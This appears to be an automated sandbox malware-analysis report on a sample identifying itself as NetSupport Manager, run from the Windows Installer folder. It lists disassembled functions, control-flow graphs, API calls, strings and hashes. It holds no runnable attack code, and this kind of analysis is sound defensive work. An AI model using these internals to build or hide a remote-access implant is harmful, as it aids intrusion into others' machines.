                                                                                          • API String ID: 514040917-984018515
                                                                                          • Opcode ID: 3e23fabc35bbd873b83eae995cb6acfd2c585e2fe731a69f5e7ee29e0a3170a3
                                                                                          • Instruction ID: a2ad6a39f6c052fac9572f62a71702839401deefd38288983ba5fc7e274cb4bc
                                                                                          • Opcode Fuzzy Hash: 3e23fabc35bbd873b83eae995cb6acfd2c585e2fe731a69f5e7ee29e0a3170a3
                                                                                          • Instruction Fuzzy Hash: C222F0B99043298BCB348F28DC95BB67BB1FB68304F50009BE84997351FB358E85CB91
                                                                                          Function 005DE039 Relevance: 24.7, APIs: 4, Strings: 10, Instructions: 152stringCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1042 5de039 1043 5de040-5de054 1042->1043 1043->1043 1044 5de056-5de085 call 5eab18 call 5df6d0 1043->1044 1049 5de0dd-5de0f4 GetModuleFileNameW 1044->1049 1050 5de087-5de0d1 GetPrivateProfileStringW lstrcmpiW 1044->1050 1052 5de0fc-5de13f call 5df030 * 2 call 5d6080 1049->1052 1053 5de0f6 GetLastError 1049->1053 1050->1049 1051 5de0d3 1050->1051 1051->1049 1061 5de141-5de14e 1052->1061 1053->1052 1061->1061 1062 5de150-5de16f call 5ed09c 1061->1062 1065 5de170-5de17a 1062->1065 1065->1065 1066 5de17c-5de191 call 5db1f0 1065->1066 1069 5de198-5de19a 1066->1069 1070 5de193 1066->1070 1071 5de1a0-5de1a9 1069->1071 1070->1069 1071->1071 1072 5de1ab-5de1b2 1071->1072 1073 5de1b5-5de1bf 1072->1073 1073->1073 1074 5de1c1-5de1ee 1073->1074 1075 5de1f0-5de1ff call 5e83b0 1074->1075 1078 5de201-5de207 1075->1078 1079 5de210 1075->1079 1080 5de209-5de20e 1078->1080 1081 5de213-5de220 call 5e83b0 1078->1081 1079->1081 1080->1079 1080->1081 1084 5de231 1081->1084 1085 5de222-5de228 1081->1085 1087 5de234-5de238 1084->1087 1086 5de22a-5de22f 1085->1086 1085->1087 1086->1084 1086->1087 1088 5de23c-5de23f 1087->1088 1089 5de23a 1087->1089 1090 5de245-5de275 call 5ea558 1088->1090 1091 5de663-5de669 1088->1091 1089->1088 1118 5de29c-5de2a6 1090->1118 1119 5de277-5de27f 1090->1119 1093 5dedbd-5dedd1 call 5df030 1091->1093 1094 5de66f-5de676 1091->1094 1102 5dede7-5dedfc DestroyWindow 1093->1102 1103 5dedd3-5dede1 PostMessageW 1093->1103 1097 5de688-5de68d 1094->1097 1098 5de678-5de682 GetCurrentDirectoryW 1094->1098 1101 5de690-5de699 1097->1101 1098->1097 1101->1101 1104 5de69b-5de6af 1101->1104 1106 5def27-5def37 call 5e82b3 1102->1106 1107 5dee02-5dee0f 1102->1107 1103->1102 1108 5de6bc-5de6ec call 5d78f0 call 5df030 1104->1108 1109 5de6b1-5de6b9 1104->1109 1112 5dee10-5dee1d 1107->1112 1108->1093 1126 5de6f2-5de70e call 5d4050 1108->1126 1109->1108 1112->1112 1116 5dee1f-5dee35 call 5e9583 1112->1116 1124 5dee4b-5dee51 1116->1124 1125 5dee37-5dee48 call 5e73d1 call 5e8c09 1116->1125 1118->1075 1122 5de281-5de28e 1119->1122 1122->1122 1127 5de290-5de600 call 5e83b0 1122->1127 1131 5dee71-5dee90 call 5df030 call 5e82b3 1124->1131 1132 5dee53-5dee6e Sleep call 5df030 call 5d4420 1124->1132 1125->1124 1126->1093 1127->1075 1143 5de606-5de60b 1127->1143 1132->1131 1143->1075
                                                                                          APIs
                                                                                          • GetPrivateProfileStringW.KERNEL32(boot,display.drv,0061A054,00640F98,00000400,system.ini), ref: 005DE0A5
                                                                                          • lstrcmpiW.KERNEL32(00640F98,shellscr.drv), ref: 005DE0B5
                                                                                          • GetModuleFileNameW.KERNEL32(00590000,?,00000100), ref: 005DE0F0
                                                                                          • GetLastError.KERNEL32 ref: 005DE0F6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ErrorFileLastModuleNamePrivateProfileStringlstrcmpi
                                                                                          • String ID: NetSupport Manager for Windows (32 bit) V14.10$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                          • API String ID: 1466566021-4233989162
                                                                                          • Opcode ID: 2b0e2bbe1ba418751d24879e6338ea849c06e2c2e837409ad202473294393e0f
                                                                                          • Instruction ID: 38c884e6b2a1d5daf440d13529726a78b54b9ad2af119d07c25922da8a0b82a8
                                                                                          • Opcode Fuzzy Hash: 2b0e2bbe1ba418751d24879e6338ea849c06e2c2e837409ad202473294393e0f
                                                                                          • Instruction Fuzzy Hash: 0C513C75A402128BCB34BF6C9C5B6693BB3FB95310F094667E5568B3D1F7704841CB92
                                                                                          Function 005D6080 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 219windowCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1242 5d6080-5d60ad GetShortPathNameW 1243 5d60af-5d60b5 GetLastError 1242->1243 1244 5d60b7-5d60bf 1242->1244 1243->1244 1245 5d60df-5d60f5 call 5e84df 1244->1245 1246 5d60c1-5d60ca 1244->1246 1250 5d613c-5d6177 call 5d5690 call 5df030 * 2 1245->1250 1251 5d60f7-5d613b wsprintfW MessageBoxW call 5e82b3 1245->1251 1247 5d60d0-5d60dd 1246->1247 1247->1245 1247->1247 1260 5d6180-5d6194 1250->1260 1260->1260 1261 5d6196-5d61ac call 5e84df 1260->1261 1264 5d621c-5d6228 1261->1264 1265 5d61ae-5d61d4 call 5df030 1261->1265 1266 5d622f-5d623a SetCurrentDirectoryW 1264->1266 1267 5d622a 1264->1267 1265->1264 1272 5d61d6-5d61d8 1265->1272 1269 5d623c-5d6241 call 5df5b0 1266->1269 1270 5d6249-5d624b 1266->1270 1267->1266 1276 5d6246 1269->1276 1274 5d6250-5d6264 1270->1274 1275 5d61e0-5d61f4 1272->1275 1274->1274 1277 5d6266-5d6271 1274->1277 1275->1275 1278 5d61f6-5d61fe 1275->1278 1276->1270 1279 5d6273-5d6280 1277->1279 1280 5d6200-5d6209 1278->1280 1279->1279 1281 5d6282-5d6293 call 5ec0c4 1279->1281 1280->1280 1283 5d620b-5d6216 1280->1283 1285 5d6299-5d62a4 1281->1285 1286 5d6388-5d639c call 5e82b3 1281->1286 1283->1264 1287 5d62a6-5d62b3 1285->1287 1287->1287 1289 5d62b5-5d62c6 call 5ec0c4 1287->1289 1293 5d62c8 1289->1293 1294 5d62eb-5d62f8 1289->1294 1295 5d62d0-5d62e4 1293->1295 1296 5d6300-5d630d 1294->1296 1295->1295 1297 5d62e6 1295->1297 1296->1296 1298 5d630f-5d6320 call 5ec0c4 1296->1298 1297->1286 1301 5d633a-5d6347 1298->1301 1302 5d6322-5d6336 1298->1302 1304 5d6350-5d635d 1301->1304 1302->1302 1303 5d6338 1302->1303 1303->1286 1304->1304 1305 5d635f-5d6366 call 5ec0c4 1304->1305 1307 5d636b-5d6370 1305->1307 1307->1286 1308 5d6372-5d6386 1307->1308 1308->1286 1308->1308
                                                                                          APIs
                                                                                          • GetShortPathNameW.KERNELBASE(?,0063C848,00000100), ref: 005D60A5
                                                                                          • GetLastError.KERNEL32 ref: 005D60AF
                                                                                            • Part of subcall function 005D5690: GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 005D56E4
                                                                                            • Part of subcall function 005D5690: GetProcAddress.KERNEL32(00000000), ref: 005D56EB
                                                                                            • Part of subcall function 005D5690: GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 005D56FC
                                                                                            • Part of subcall function 005DF030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 005DF04D
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF09D
                                                                                            • Part of subcall function 005DF030: wvsprintfW.USER32(?,?,00000000), ref: 005DF0BE
                                                                                            • Part of subcall function 005DF030: wsprintfW.USER32 ref: 005DF0D3
                                                                                          • wsprintfW.USER32 ref: 005D610B
                                                                                          • MessageBoxW.USER32(00000000,?,NetSupport Manager for Windows (32 bit) V14.10,00000000), ref: 005D6124
                                                                                          • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 005D6230
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf$NamePath$AddressCurrentDirectoryErrorHandleLastLocalLongMessageModuleProcShortTimewvsprintf
                                                                                          • String ID: C:\Windows\Installer\$Fatal Error, cannot continuemodule=<%s>, e1=%d, path=<%s>, e2=%d$IKS.LIC$NST.LIC$NSW.LIC$NetSupport Manager for Windows (32 bit) V14.10$longpath=%s$path=%s
                                                                                          • API String ID: 791442131-2982756972
                                                                                          • Opcode ID: 7db5a8becfbe1f6d772f58dd8ca3d71fa037155ab4c84c88d53ec201f49692fc
                                                                                          • Instruction ID: 318456a2a5810e3a529cda34e3bd9757de0aa855f1dcf701ed9cb3180ea0c57d
                                                                                          • Opcode Fuzzy Hash: 7db5a8becfbe1f6d772f58dd8ca3d71fa037155ab4c84c88d53ec201f49692fc
                                                                                          • Instruction Fuzzy Hash: BE71F536A402029ACB306F6C9C2BB763BA2FF55765F440457F806DB392F7748942C7A1
                                                                                          Function 006059BA Relevance: 19.9, APIs: 9, Strings: 2, Instructions: 628fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateFileW.KERNELBASE(00000000,00000000,?,0000000C,00000001,00000080,00000000,00000000,00000109,00000109), ref: 00605BFD
                                                                                          • CreateFileW.KERNEL32(7FFFFFFF,7FFFFFFF,?,0000000C,00000001,00000001,00000000), ref: 00605C36
                                                                                          • GetLastError.KERNEL32 ref: 00605C5A
                                                                                          • GetFileType.KERNEL32(005B06CD), ref: 00605C79
                                                                                          • GetLastError.KERNEL32 ref: 00605C9E
                                                                                          • CloseHandle.KERNEL32(005B06CD), ref: 00605CB0
                                                                                          • CloseHandle.KERNEL32(005B06CD), ref: 00606067
                                                                                          • CreateFileW.KERNEL32(00000000,00000000,?,0000000C,00000003,00000001,00000000), ref: 00606087
                                                                                          • GetLastError.KERNEL32 ref: 00606091
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: File$CreateErrorLast$CloseHandle$Type
                                                                                          • String ID: @$H
                                                                                          • API String ID: 352418905-104103126
                                                                                          • Opcode ID: ae5c543edc216eb033c58a464c3a72abf9a3987210c7532ee152ff75bdd35cab
                                                                                          • Instruction ID: cd6bcf7954b54379b9acc36d3a4ccec031bdc522e617f3526e2870a2f1b47630
                                                                                          • Opcode Fuzzy Hash: ae5c543edc216eb033c58a464c3a72abf9a3987210c7532ee152ff75bdd35cab
                                                                                          • Instruction Fuzzy Hash: B232013198068A9BDF298F54C849BEF7FB2EF41304F244629E5A2E62E1D3758E41CF51
                                                                                          Function 005DF367 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 61registryCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1781 5df367-5df36e 1782 5df370-5df377 1781->1782 1783 5df37d-5df38e 1782->1783 1784 5df423-5df43e LeaveCriticalSection call 5e82b3 1782->1784 1786 5df395-5df3cf wsprintfW RegOpenKeyExW 1783->1786 1787 5df390 1783->1787 1789 5df419-5df41d 1786->1789 1790 5df3d1-5df3f9 RegQueryValueExW 1786->1790 1787->1786 1789->1782 1789->1784 1791 5df40c-5df413 RegCloseKey 1790->1791 1792 5df3fb-5df407 call 5e8406 1790->1792 1791->1789 1792->1791
                                                                                          APIs
                                                                                          • wsprintfW.USER32 ref: 005DF3A2
                                                                                          • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 005DF3C5
                                                                                          • RegQueryValueExW.ADVAPI32(00000000,Log,00000000,?,?,?), ref: 005DF3F5
                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 005DF413
                                                                                          • LeaveCriticalSection.KERNEL32(0064250C), ref: 005DF428
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCriticalLeaveOpenQuerySectionValuewsprintf
                                                                                          • String ID: @$Log$SOFTWARE\Productive Computer Insight\%s$winst32$winstall
                                                                                          • API String ID: 2277609062-2172721721
                                                                                          • Opcode ID: 694cad828c09866870c908944ae89d9f42f2e3e7c0a4e8e3247116b395a01856
                                                                                          • Instruction ID: e46c74171a274e0495dd376162d58ca1dc2908608876a99167851dcd00bd8233
                                                                                          • Opcode Fuzzy Hash: 694cad828c09866870c908944ae89d9f42f2e3e7c0a4e8e3247116b395a01856
                                                                                          • Instruction Fuzzy Hash: A01108B5900218DBDB30CB54EC55BEE77B6FB84304F1040AAF50EE6180DB755A84CF91
                                                                                          Function 005C5A70 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 110sleepsynchronizationCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1795 5c5a70-5c5a8e call 5b0040 call 5c5120 1799 5c5a93-5c5aa2 1795->1799 1800 5c5aa9-5c5ab0 1799->1800 1801 5c5aa4-5c5aa7 1799->1801 1802 5c5ab8-5c5abf 1800->1802 1803 5c5ab2-5c5ab6 1800->1803 1801->1800 1804 5c5ac7-5c5ada WaitForMultipleObjects 1802->1804 1805 5c5ac1-5c5ac5 1802->1805 1803->1802 1806 5c5adc 1804->1806 1807 5c5b4a-5c5b4c 1804->1807 1805->1804 1810 5c5ae0-5c5af4 WaitForSingleObject 1806->1810 1808 5c5b4e-5c5b51 1807->1808 1809 5c5b95-5c5ba3 1807->1809 1811 5c5b82-5c5b85 1808->1811 1812 5c5b53-5c5b7f Sleep GetCurrentProcess TerminateProcess 1808->1812 1813 5c5af6-5c5b00 call 5c59d0 1810->1813 1814 5c5b02-5c5b1e ResetEvent call 5c55b0 1810->1814 1811->1809 1816 5c5b87-5c5b92 call 5c55b0 1811->1816 1813->1814 1821 5c5b29-5c5b43 SetEvent WaitForMultipleObjects 1814->1821 1822 5c5b20-5c5b26 call 5c59d0 1814->1822 1816->1809 1821->1810 1825 5c5b45 1821->1825 1822->1821 1825->1807
                                                                                          APIs
                                                                                            • Part of subcall function 005C5120: GetCurrentProcess.KERNEL32 ref: 005C513C
                                                                                            • Part of subcall function 005C5120: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSIF373.tmp,00000104), ref: 005C515A
                                                                                            • Part of subcall function 005C5120: WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSIF373.tmp,000000FF,?,00000104,006199F4,00000000), ref: 005C51E4
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 005C5AD6
                                                                                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 005C5AEC
                                                                                          • ResetEvent.KERNEL32(?), ref: 005C5B08
                                                                                          • SetEvent.KERNEL32(?), ref: 005C5B30
                                                                                          • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 005C5B3F
                                                                                          • Sleep.KERNEL32(0000AFC8), ref: 005C5B59
                                                                                          • GetCurrentProcess.KERNEL32(000000FE), ref: 005C5B64
                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 005C5B6B
                                                                                            • Part of subcall function 005C55B0: GetTickCount.KERNEL32 ref: 005C5618
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProcessWait$CurrentEventMultipleObjects$ByteCharCountFileModuleMultiNameObjectResetSingleSleepTerminateTickWide
                                                                                          • String ID: MiniDump
                                                                                          • API String ID: 2601538400-2840755058
                                                                                          • Opcode ID: 6c190e6e63a89cc3a8d28ea36fbab1e302d3d3675e931e811c0dbd4a2feaffe1
                                                                                          • Instruction ID: d581cf63a7d5df77663c064ab28bc14243817d6a18551e1fe5435d38be5ce9b5
                                                                                          • Opcode Fuzzy Hash: 6c190e6e63a89cc3a8d28ea36fbab1e302d3d3675e931e811c0dbd4a2feaffe1
                                                                                          • Instruction Fuzzy Hash: 9731F8726006016FD710DBE5AC49F9B7BA9BB84720F54162DFA28D61D0F770A940C7E1
                                                                                          Function 005D5690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 173libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 005D56E4
                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 005D56EB
                                                                                          • GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 005D56FC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressHandleLongModuleNamePathProc
                                                                                          • String ID: GetLongPathNameW$kernel32
                                                                                          • API String ID: 1057403391-1414249016
                                                                                          • Opcode ID: 10f71336cd56fb6de65993b518629e62df4bcc2d696b221f928b4db9cedf0cf8
                                                                                          • Instruction ID: a2ddf76e2e26fa2c29902b6bb8dd95f089e1a1d237b61fb7c45a092c3a6e30c5
                                                                                          • Opcode Fuzzy Hash: 10f71336cd56fb6de65993b518629e62df4bcc2d696b221f928b4db9cedf0cf8
                                                                                          • Instruction Fuzzy Hash: B851D331A0061A8BCB349B688D627FB77E5FF84354F5485A6ED4ADB380FA745E40C790
                                                                                          Function 005DEF3A Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • %04d-%02d-%02d %02d:%02d:%02d.%03d , xrefs: 005DF097
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: %04d-%02d-%02d %02d:%02d:%02d.%03d
                                                                                          • API String ID: 0-2448528332
                                                                                          • Opcode ID: 0736e43d10185a6dd293fb26106e1724083f7c548f28d5b2a8a09d692ffe16a4
                                                                                          • Instruction ID: d7666e361bf1d68fce8cb7b08f2210e776b6894ffd0ef04311aabaf439488146
                                                                                          • Opcode Fuzzy Hash: 0736e43d10185a6dd293fb26106e1724083f7c548f28d5b2a8a09d692ffe16a4
                                                                                          • Instruction Fuzzy Hash: EE515972804209CBCB309FA8DC916F97BB5FF45315F4846BBE94687291E3349B84CBA0
                                                                                          Function 005ECAE1 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005F92EA: EnterCriticalSection.KERNEL32(?,?,?,005F2AA8,0000000D,?,005B97EE,00000000,?,?), ref: 005F9314
                                                                                          • DecodePointer.KERNEL32(00632FA8,00000020,005ECC48,?,00000001,00000000,?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D), ref: 005ECB2B
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB3C
                                                                                            • Part of subcall function 005F299E: EncodePointer.KERNEL32(00000000,005FAD09,00642898,00000314,00000000,?,?,?,?,?,005EF35C,00642898,Microsoft Visual C++ Runtime Library,00012010), ref: 005F29A0
                                                                                          • DecodePointer.KERNEL32(-00000004,?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB62
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB75
                                                                                          • DecodePointer.KERNEL32(?,005ECC88,000000FF,?,005F9311,00000011,?,?,005F2AA8,0000000D,?,005B97EE), ref: 005ECB7F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Pointer$Decode$CriticalEncodeEnterSection
                                                                                          • String ID:
                                                                                          • API String ID: 2427772772-0
                                                                                          • Opcode ID: cc28189ec2c39fa0950c251789abca68aab889919efd774155cbebc1c9d81c43
                                                                                          • Instruction ID: e487305c20cf9a2a54358069fd18ffb3ba961063f5a5eb4ca8119375b2edfc5b
                                                                                          • Opcode Fuzzy Hash: cc28189ec2c39fa0950c251789abca68aab889919efd774155cbebc1c9d81c43
                                                                                          • Instruction Fuzzy Hash: 48316974D1038A8FDF14AFAAD88679CBFF6BF48310F54402AE085A6251CBB48842CF24
                                                                                          Function 005C5BB0 Relevance: 7.5, APIs: 5, Instructions: 44synchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SetEvent.KERNEL32(000001F4), ref: 005C5BC4
                                                                                          • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 005C5BE0
                                                                                          • CloseHandle.KERNELBASE(000001F4), ref: 005C5BFC
                                                                                          • CloseHandle.KERNEL32(000001FC), ref: 005C5C10
                                                                                          • CloseHandle.KERNEL32 ref: 005C5C19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
